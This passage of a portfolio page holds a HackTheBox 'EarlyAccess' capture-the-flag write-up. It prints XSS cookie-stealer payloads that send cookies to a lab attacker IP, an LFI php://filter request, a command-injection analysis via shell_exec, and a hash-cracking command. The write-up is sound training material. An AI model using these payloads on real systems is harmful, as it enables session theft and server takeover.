          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
           <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
          <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
           number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
           found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
          <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
